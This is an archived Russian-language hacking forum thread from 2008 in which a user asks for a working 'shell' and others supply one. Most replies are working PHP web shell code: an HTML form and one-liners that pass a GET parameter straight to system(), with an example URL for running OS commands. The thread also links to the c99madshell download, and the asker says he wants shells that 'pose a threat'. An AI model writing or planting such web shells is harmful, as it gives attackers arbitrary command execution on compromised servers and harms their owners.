PDA

Просмотр полной версии : Скрипт шелла


ZEXEL
10.01.2008, 17:13
Дайте ктото скрипт нормального шелла

__mad
10.01.2008, 17:14
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
system($_GET['cmd']);
}
?>
</pre>
</BODY></HTML>

ZEXEL
10.01.2008, 17:22
И что через етот шелл можна делать ?

FraiDex
10.01.2008, 17:26
И что через етот шелл можна делать ?
ну мир с помощью его ты не перевернёш. но команды в ОС выполнять точно сможеш.. (если safe_mode=off)

AFoST
10.01.2008, 17:27
Я бы упростил)))
файл cmd.php
<? system($cmd); ?>
Дает доступ к командной строке, допустим сервак на винде. Обращаемся к скрипту через броузер:
http://site/path/cmd.php?cmd=dir --выдаст содержимое директории. Так же можно выпонлять и все другие команды командной строки, если хватит прав.

ZEXEL
10.01.2008, 17:27
Да просто system на сервере делать нельзя, потому и шел етот безполезен в моем случаии !
а какие еще есть шеллы что бы представляли угрозу?

FraiDex
10.01.2008, 17:33
Я бы упростил)))
файл cmd.php
Код:

<? system($cmd); ?>


немного подправлю...
<? system($_GET['cmd']) ?>
так немного правельнее ;)

FraiDex
10.01.2008, 17:35
Zexel, ты хоть знаеш что такое шелл и для чего он?
может те шелл-коды нужны?

V1k
10.01.2008, 17:36
c99madshell (http://madnet.name/files/1/10.html)

ZEXEL
10.01.2008, 17:36
Да, шел коды !

ZEXEL
10.01.2008, 17:38
Спасибо за ссылку, теперь всё !